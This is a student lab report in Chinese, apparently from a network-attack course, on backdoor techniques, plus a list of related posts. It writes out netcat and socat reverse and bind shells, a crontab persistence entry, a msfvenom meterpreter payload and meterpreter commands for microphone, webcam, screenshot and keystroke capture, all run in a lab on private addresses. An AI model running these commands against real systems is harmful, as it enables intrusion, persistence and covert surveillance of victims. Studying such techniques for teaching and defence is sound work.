20145237 Exp2 后门原理与实践
20145237《网络对抗》Exp2 后门原理与实践
Windows获得Linux Shell
在Windows下,先使用ipconfig
指令查看本机IP:
输入ncat.exe -l -p 5237
使用ncat.exe
程序监听本机的5237端口:
在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5237端口:
Windows下成功获得了一个Kali的shell,运行ls指令如下:
Linux获得Windows Shell
过程与之前的类似,在Kali环境下用ifconfig
查看IP:
使用nc -l -p 5237
指令监听5237端口:
在Windows下,输入ncat.exe -e cmd.exe 192.168.35.128 5237
使用ncat.exe程序的-e选项项反向连接Kali主机的5237端口:
Kali下可以看到Windows的命令提示,可以输入Windows命令:
使用netcat获取主机操作Shell,cron启动
实验内容
先在Windows系统下,用`ncat.exe -l -p 5237
,监听5237端口
用crontab -e指令编辑一条定时任务(输入3,选vim.basic)
在最后一行添加30 * * * * /bin/netcat 192.168.1.200 5237 -e /bin/sh,意思是在每个小时的第30分钟反向连接Windows主机的5237端口(设置成30的原因是我当时的时间是28分):
使用socat获取主机操作Shell, 任务计划启动
使用socat获取主机操作Shell, 任务计划启动
实践过程
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你socat.exe
文件的路径,在添加参数一栏填写tcp-listen:5237 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe绑定到端口5237,同时把cmd.exe
的stderr
重定向到stdout
上:
创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:
此时,在Kali环境下输入指令socat - tcp:192.168.1.200:5237,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5237端口,此时可以发现已经成功获得了一个cmd shell:
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5237 -f exe > 20145237_backdoor.exe生成后门程序:
通过nc指令将生成的后门程序传送到Windows主机上:
windows:ncat.exe -l 5237 > 20145237.exe
kali:nc 192.168.1.100 5237 < 20145237.exe
在Kali上使用msfconsole指令进入msf控制台,set payload windows/meterpreter/reverse_tcp
,使用监听模块,设置payload,设置反弹回连的IP和端口
设置完成后,执行监听:
打开Windows上的后门程序:
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用record_mic指令可以截获一段音频:
使用webcam_snap指令可以使用摄像头进行拍照:
使用webcam stream指令可以使用摄像头进行录像:
使用screenshot指令可以进行截屏:
使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
转载于:https://www.cnblogs.com/20145237fhn/p/8707686.html
20145237 Exp2 后门原理与实践相关推荐
- Exp2 后门原理与实践 20164323段钊阳
220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,. (2)例举你知道的后门如何 ...
- 2018-2019 Exp2 后门原理与实践
2018-2019 Exp2 后门原理与实践 目录 一.实验内容说明及基础问题回答 二.工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Win ...
- 2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp2 后门原理与实践 目录 0. 基础知识 1. 实验内容 1.0 常用后门工具 1.1 使用netcat获取主机操作S ...
- Exp2 后门原理与实践 20164321 王君陶
Exp2 后门原理与实践 20164321 王君陶 一.实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:通过漏洞,点击陌生链接,或者浏览不良网页挂马. 2.例举你知 ...
- Exp2 后门原理与实践 20204308李文艳
Exp2 后门原理与实践 20204308李文艳 1. 基础问题 1.1 例举你能想到的一个后门进入到你系统中的可能方式? 1.2 例举你知道的后门如何启动起来(win及linux)的方式? 1.3 ...
- 20155317王新玮《网络对抗》Exp2 后门原理与实践
20155317王新玮<网络对抗>Exp2 后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划 ...
- 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...
- Exp2 后门原理与实践
Exp2 后门原理与实践 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) window ...
- 20194307肖江宇Exp2—后门原理与实践
文章目录 20194307肖江宇Exp-2后门原理与实践 1.实验基础 1.1基础知识 1.2常用后门工具 NC和Netcat SoCat 任何代理.转发等功能都可以用该工具实现. Meterpret ...
最新文章
- 深度学习在小分子药物研发中的应用
- 华为算力最强AI芯片商用:2倍于英伟达V100!开源AI框架,对标TensorFlow和PyTorch...
- 卧槽!面试官 5 连问一个 TCP 连接可以发多少个 HTTP 请求?
- 【放置奇兵】踩坑记录( 白字、红字、黄字)tips 小技巧
- [转]Delphi中QuotedStr介绍及使用
- 《c语言从入门到精通》看书笔记——第7章 循环控制
- 使用ObjectDataSource 显示数据
- 计算机软考可以直接高级吗,计算机软考没有中级能考高级吗
- Linux下无需按下回车(无阻塞)读取输入键值
- java根据exif旋转,关于图片文件旋转JPEG与EXIF信息
- C# RSACryptoServiceProvider加密解密签名验签和DESCryptoServic
- Problem(三):工作中的记录。。。。
- 服务器装系统怎么显示盘符,安装双系统如何实现各系统盘盘符均显示为C盘
- POJ 2976 裸的01分数规划
- PLC 控制柜常用电气元件整理表
- CentOS7 wifi安装配置问题总结
- 工业互联网是什么,和工业4.0对比,有什么区别?
- OV7725摄像头显示VGA/LCD
- 从共识算法开谈 - 硬盘性能的最大几个误解
- Axure如何填充背景图